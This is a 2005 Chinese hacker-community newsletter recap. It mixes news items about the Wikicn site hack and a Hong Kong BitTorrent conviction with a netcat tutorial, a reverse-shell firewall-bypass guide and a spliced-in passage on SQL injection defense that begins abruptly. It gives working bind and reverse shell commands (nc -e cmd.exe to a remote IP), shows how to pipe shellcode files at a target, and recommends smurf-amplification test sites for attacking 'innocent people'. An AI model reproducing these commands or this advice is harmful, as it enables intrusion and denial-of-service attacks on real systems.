原创-安全之门第六期内容回顾
作者: 苏樱 发布日期: 2005-11-20 查看数: 96 出自: http://www.neteasy.cn
一、新闻部分
[转载]维客中国被黑关闭
信息来源:http://witao.com/node/1164
在 zh.wikipedia Group 看到的消息,今日下午16点左右,在维客中国和维基百科编者之间的战争升级,维客中国服务器数据库被几位据称是维基百科编者的人侵入并篡改主页,删除侵权数据。18点,维客中国 wiki 系统被重建。小编于发稿时仍能上维客中国。
10月19日维基百科被封时,维客中国通过机器复制(machine copy)将大量维基百科的文章放在自己站点上,并且大力宣传自己为第一中文百科,遭到维基百科编者的反对,维客中国一时出现了1人编辑10人破坏的壮观场面。小编几天来看到很多指摘维客中国的言论,看了一下上面有关“方兴东”的条目,个人觉得确实不咋样。
维客中国由多派网、博客网、互联网实验室共同创办,2005年10月20日更名为维客中国。维客中国与中文维基百科类似,它的条目已上万,但目前大多数是直接从维基百科的条目中复制内容。据分析这些内容复制有可能是机器自动完成,维基百科的用户以相同的用户名在维客中国注册后,相关用户界面已存在,与维基百科的同一页面的某一历史页面相同。
维客中国(www.wikicn.com)关闭,远离是非- -
信息来源:http://fangxd.blogchina.com/3368610.html
相关信息见:http://post.baidu.com/f?kw=wiki
维客中国(www.wikicn.com)的前身是搜派(http://www.sopai.com/),主要是由教育网的几个学生业余时间发起建设的。后来,寻求我们提供一些赞助。我和卢亮一直认为,博客网除了商业化外,一定需要积极参与和支持一些公益性的项目。因此,我们特地申请购买了教育网的带宽,架设了服务器。这完全是出于公益性目的的赞助,也是为大家提供一个新的选择。我们反复向发起者确认过网站内容没有侵权(希望真有版权问题的地方,能通过正常方式和渠道进行具体指出,按照基本规则沟通和解决,包括诉诸法律)。
维客中国开通之日,就承受了各方面的压力,我们努力做了一些沟通。根本出发点是希望知识共享的精神能够在中国互联网不断发扬光大。但是,由于各种原因,从第一天开始,维客中国遭遇各种猜疑和攻击,今天开始,遭遇大量内容的删除,最近两个月的数据全部被黑,还持续灌入大量反动和黄色的内容,还有以维基社区名义的各种漫骂和诽谤。作为一个完全公益性、开放式的应用,对于维客中国网友编辑的每个词条,我们无力一一检验每一个词条版权的严谨性;也没有精力答复和应对各种恶意的、完全是莫须有的猜度;我们无意冒犯维基社区;更无力抵挡各种网络攻击和破坏,无力继续提供正常的访问和服务。因此,决定就此暂时关闭。
维客中国从10月20日开通,到今天活了不到10天时间。如果它的死能够给一些人带来慰籍和快乐,那已经是死得其所!只希望你们的快乐能够给中国互联网的未来多一份贡献。生存和死亡,善与恶,高尚和卑鄙,在互联网本来就可能是一线之隔。有人攻击得高尚,有的死得光荣,但维客中国的死仅仅是希望获得一份基本的清静。
[转载]全球首次裁定BT有罪 香港法院判定罪名成立
信息来源:hackbase
香港一名男子因利用“点对点档案分享”软件在互联网非法发放3部版权电影,被香港屯门裁判法院判定罪名成立,将于11月7日判刑。
对于全球首次有人因BT侵权行为被法院裁定罪名成立,在香港社会引起强烈反响。特区政府工商及科技局局长曾俊华表示,本次裁决意义重大,并呼吁市民要尊重知识产权。
国际唱片业协会和香港影业协会对裁决表示欢迎。国际唱片业协会香港分会总裁冯添枝表示,一向有人认为网上上载和“播种”活动不属分发,不会犯法,这次判例澄清了法例的灰色地带。
据了解,38岁香港男子陈乃明今年年初以“古惑天王”为代号,利用“点对点档案分享”软件在互联网上载“种子”,非法发放3部版权电影,1月12日被海关拘捕。
香港律师会知识产权组委员黄锦山表示,本次判决意义在于法官清晰厘定,将“种子”影音作品在网上上载是一种侵权行为。
香港电影制片家协会会长洪祖星表示,BT对香港电影业造成的伤害较翻版更大,严重侵犯了知识产权。
华纳唱片董事陈志光说,本次裁决反映特区政府正视互联网上日益严重的侵权行为。
也有熟悉《版权条例》的学者指出,BT技术只是将档案播种般放在网上,让其他人下载,按《版权条例》只属民事索偿行为,本次法庭将该行为界定为分发,属于刑事罪行,后果深远而且有争议性。
知名导演尔冬升表示,这是一种科技发展所衍生出来的问题,并质疑是否严重到要判刑的地步。
城市大学商学院副院长李国安认为,此次裁决只会迫使网民隐藏身份,或使用其他途径进行侵权。他认为,音乐、电影等版权持有人应提供合理价钱,供网民合法下载有关产品
二、技术部分
nc的说明及使用
netcat被誉为网络安全界的‘瑞士军刀’,相信没有什么人不认识它吧......
一个简单而有用的工具,透过使用TCP或UDP协议的网络连接去读写数据。它被设计成一个稳定的后门工具,
能够直接由其它程序和脚本轻松驱动。同时,它也是一个功能强大的网络调试和探测工具,能够建立你需要的几
乎所有类型的网络连接,还有几个很有意思的内置功能(详情请看下面的使用方法)。
在中国,它的WINDOWS版有两个版本,一个是原创者Chris Wysopal写的原版本,另一个是由‘红与黑’编译
后的新‘浓缩’版。‘浓缩’版的主程序只有10多KB(10多KB的NC是不能完成下面所说的第4、第5种使用方法,
有此功能的原版NC好象要60KB:P),虽然“体积”小,但很完成很多工作。
======================================================
软件介绍:
工具名:Netcat
作者:Hobbit && Chris Wysopal
网址:http://www.atstake.com/research/tools/network_utilities/
类别:开放源码
平台:Linux/BSD/Unix/Windows
WINDOWS下版本号:[v1.10 NT]
=====================================================================================================
参数介绍:
nc.exe -h即可看到各参数的使用方法。
基本格式:nc [-options] hostname port[s] [ports] ...
nc -l -p port [options] [hostname] [port]
-d 后台模式
-e prog 程序重定向,一旦连接,就执行 [危险!!]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h 帮助信息
-i secs 延时的间隔
-l 监听模式,用于入站连接
-L 连接关闭后,仍然继续监听
-n 指定数字的IP地址,不能用hostname
-o file 记录16进制的传输
-p port 本地端口号
-r 随机本地及远程端口
-s addr 本地源地址
-t 使用TELNET交互方式
-u UDP模式
-v 详细输出--用两个-v可得到更详细的内容
-w secs timeout的时间
-z 将输入输出关掉--用于扫描时
端口的表示方法可写为M-N的范围格式。
=====================================================================================================
基本用法:
大概有以下几种用法:
1)连接到REMOTE主机,例子:
格式:nc -nvv 192.168.x.x 80
讲解:连到192.168.x.x的TCP80端口
2)监听LOCAL主机,例子:
格式:nc -l -p 80
讲解:监听本机的TCP80端口
3)扫描远程主机,例子:
格式:nc -nvv -w2 -z 192.168.x.x 80-445
讲解:扫描192.168.x.x的TCP80到TCP445的所有端口
4)REMOTE主机绑定SHELL,例子:
格式:nc -l -p 5354 -t -e c:winntsystem32cmd.exe
讲解:绑定REMOTE主机的CMDSHELL在REMOTE主机的TCP5354端口
5)REMOTE主机绑定SHELL并反向连接,例子:
格式:nc -t -e c:winntsystem32cmd.exe 192.168.x.x 5354
讲解:绑定REMOTE主机的CMDSHELL并反向连接到192.168.x.x的TCP5354端口
以上为最基本的几种用法(其实NC的用法还有很多,
当配合管道命令“|”与重定向命令“<”、“>”等等命令功能更强大......)。
=====================================================================================================
高级用法:
6)作攻击程序用,例子:
格式1:type.exe c:exploit.txt|nc -nvv 192.168.x.x 80
格式2:nc -nvv 192.168.x.x 80 < c:exploit.txt
讲解:连接到192.168.x.x的80端口,并在其管道中发送c:exploit.txt的内容(两种格式确有相同的效果,
真是有异曲同工之妙:P)
附:c:exploit.txt为shellcode等
7)作蜜罐用[1],例子:
格式:nc -L -p 80
讲解:使用-L(注意L是大写)可以不停地监听某一个端口,直到ctrl+c为止
8)作蜜罐用[2],例子:
格式:nc -L -p 80 > c:log.txt
讲解:使用-L可以不停地监听某一个端口,直到ctrl+c为止,同时把结果输出到c:log.txt中,如果把‘>’
改为‘>>’即可以追加日志
附:c:log.txt为日志等
9)作蜜罐用[3],例子:
格式1:nc -L -p 80 < c:honeypot.txt
格式2:type.exe c:honeypot.txt|nc -L -p 80
讲解:使用-L可以不停地监听某一个端口,直到ctrl+c为止,并把c:honeypot.txt的内容‘送’入其
管道中
如果攻击者知道应用会将表单中输入的内容直接用于验证身份的查询,他就会尝试输入某些特殊的SQL字符串篡改查询改变其原来的功能,欺骗系统授予访问权限。 系统环境不同,攻击者可能造成的损害也不同,这主要由应用访问数据库的安全权限决定。如果用户的帐户具有管理员或其他比较高级的权限,攻击者就可能对数据库的表执行各种他想要做的操作,包括添加、删除或更新数据,甚至可能直接删除表。 二、如何防范? 好在要防止ASP.NET应用被SQL注入式攻击闯入并不是一件特别困难的事情,只要在利用表单输入的内容构造SQL命令之前,把所有输入内容过滤一番就可以了。过滤输入内容可以按多种方式进行。 ⑴ 对于动态构造SQL查询的场合,可以使用下面的技术: 第一:替换单引号,即把所有单独出现的单引号改成两个单引号,防止攻击者修改SQL命令的含义。再来看前面的例子,“SELECT * from Users WHERE login = or 1=1 AND password = or 1=1”显然会得到与“SELECT * from Users WHERE login = or 1=1 AND password = or 1=1”不同的结果。 第二:删除用户输入内容中的所有连字符,防止攻击者构造出类如“SELECT * from Users WHERE login = mas -- AND password =”之类的查询,因为这类查询的后半部分已经被注释掉,不再有效,攻击者只要知道一个合法的用户登录名称,根本不需要知道用户的密码就可以顺利获得访问权限。 第三:对于用来执行查询的数据库帐户,限制其权限。用不同的用户帐户执行查询、插入、更新、删除操作。由于隔离了不同帐户可执行的操作,因而也就防止了原本用于执行SELECT命令的地方却被用于执行INSERT、UPDATE或DELETE命令。 ⑵ 用存储过程来执行所有的查询。SQL参数的传递方式将防止攻击者利用单引号和连字符实施攻击。此外,它还使得数据库权限可以限制到只允许特定的存储过程执行,所有的用户输入必须遵从被调用的存储过程的安全上下文,这样就很难再发生注入式攻击了。 ⑶ 限制表单或查询字符串输入的长度。如果用户的登录名字最多只有10个字符,那么不要认可表单中输入的10个以上的字符,这将大大增加攻击者在SQL命令中插入有害代码的难度。 ⑷ 检查用户输入的合法性,确信输入的内容只包含合法的数据。数据检查应当在客户端和服务器端都执行——之所以要执行服务器端验证,是为了弥补客户端验证机制脆弱的安全性。 在客户端,攻击者完全有可能获得网页的源代码,修改验证合法性的脚本(或者直接删除脚本),然后将非法内容通过修改后的表单提交给服务器。因此,要保证验证操作确实已经执行,唯一的办法就是在服务器端也执行验证。你可以使用许多内建的验证对象,例如RegularExpressionValidator,它们能够自动生成验证用的客户端脚本,当然你也可以插入服务器端的方法调用。如果找不到现成的验证对象,你可以通过CustomValidator自己创建一个。 ⑸ 将用户登录名称、密码等数据加密保存。加密用户输入的数据,然后再将它与数据库中保存的数据比较,这相当于对用户输入的数据进行了“消毒”处理,用户输入的数据不再对数据库有任何特殊的意义,从而也就防止了攻击者注入SQL命令。System.Web.Security.FormsAuthentication类有一个HashPasswordForStoringInConfigFile,非常适合于对输入数据进行消毒处理。 ⑹ 检查提取数据的查询所返回的记录数量。如果程序只要求返回一个记录,但实际返回的记录却超过一行,那就当作出错处理。
nc妙用,反向连接穿越防火强
提交者QQ号码: 13865333
nc妙用,反向连接穿越防火强 (作者:greenice www.ls3389.com )
被称为瑞士军刀的NC其实有很多妙用,网上有很多使用说明,但都讲得很浅。
现在讲其中的一个妙用:
很多防火强都限定了端口,不给正向连接。但是由里向外反向连接是可以的!!
先在本机用
nc -l -p 54
开一个端口!
进入目标主机后(怎么进那是你的问题了,比如U)在目标主机中用
nc 你的本机IP 54 >> nc -e cmd.exe
这时nc就会反向发一个shell给你,防火强就会为你转发数据
nslookup用法
nslookup
set type=MX
haiyang.net
这样可以查haiyang.net的邮件服务器地址
set type=all
可以查所有的,像A记录
三、推荐网友使用的工具
[转载]一个提供在线扫描的网站
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
一般在外面没有扫描软件 可以暂时信任他
[转载]在线检测网络是否能作为反映射攻击媒介的站
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
用这个站可以检测出一个大型网络是否能帮你实施反映射攻击
虽然现在很少有可以的了 不过这个可以测试
当然还可以检测自己是否有可能成为替罪羊
http://www.powertech.no/smurf/
[转载]分布式反映射拒绝服务攻击媒介在线测试器
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
如果测试成功 就代表您可以用该网络作为反映射的中转 来放大您的攻击信号
从而对那些无辜的人发动攻击 同时让另外一帮无辜的人为你做掩护
心狠手辣必须品
http://www.rexswain.com/httpview.html
转载]Windows技术综合信息查询站
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
这个资料很全 而且更新的比较勤快 所以资料邪恶八进制就不转载了
大家来这里看好了
http://www.onecomputerguy.com/
提示:登录任何站点都要小心谨慎,注意不要中木马病毒!